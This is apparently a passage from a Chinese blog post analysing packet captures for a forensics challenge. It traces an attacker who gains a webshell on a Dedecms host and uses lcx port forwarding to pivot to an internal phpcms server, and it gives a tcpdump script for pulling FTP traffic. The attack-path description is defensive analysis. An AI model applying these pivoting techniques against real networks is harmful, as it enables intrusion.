首先攻击者(172.16.10.110)通过一台可以访问到的 Windows 主机 192.168.20.117 (Dedecms) 拿到 webshell 以后
通过 lcx 将内网的主机 192.168.20.88 的 80 端口(phpcms)转发到 172.16.10.110 的 8888 端口
进一步利用漏洞拿到内网主机的权限

到这里 HTTP 层面的题目感觉应该已经分析的差不多了 , 只要拿到题目应该就可以直接填答案了
这道题目还提供了 ftp 的日志
应该还和 ftp 协议有关

#!/bin/bash
#ftp.sh

target_folder='ftp'

mkdir ${target_folder}

for file in `ls *.pcap`;
do
   echo "Dumping ftp package in ${file}..."
   tcpdump -A -s 0 'host 192.168.20.117 or host 192.168.20.248' -r $file -w ${target_folder}/${file}
   echo "${file} Done!"
done
image.png
image.png
image.png

虽然有 FTP 的包 , 但是似乎并没有日志中的IP
有可能是我数据包拷贝的不全 ?

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 人面猴
    序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 157,298评论 4 360
  • 死咒
    序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 66,701评论 1 290
  • 救了他两次的神仙让他今天三更去死
    文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 107,078评论 0 237
  • 道士缉凶录:失踪的卖姜人
    文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 43,687评论 0 202
  • 港岛之恋(遗憾婚礼)
    正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 52,018评论 3 286
  • 恶毒庶女顶嫁案:这布局不是一般人想出来的
    文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 40,410评论 1 211
  • 城市分裂传说
    那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,729评论 2 310
  • 双鸳鸯连环套:你想象不到人心有多黑
    文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 30,412评论 0 194
  • 万荣杀人案实录
    序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 34,124评论 1 239
  • 护林员之死
    正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 30,379评论 2 242
  • 白月光启示录
    正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 31,903评论 1 257
  • 活死人
    序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 28,268评论 2 251
  • 日本核电站爆炸内幕
    正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 32,894评论 3 233
  • 男人毒药:我在死后第九天来索命
    文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 26,014评论 0 8
  • 一桩弑父案,背后竟有这般阴谋
    文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,770评论 0 192
  • 情欲美人皮
    我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 35,435评论 2 269
  • 代替公主和亲
    正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 35,312评论 2 260

推荐阅读更多精彩内容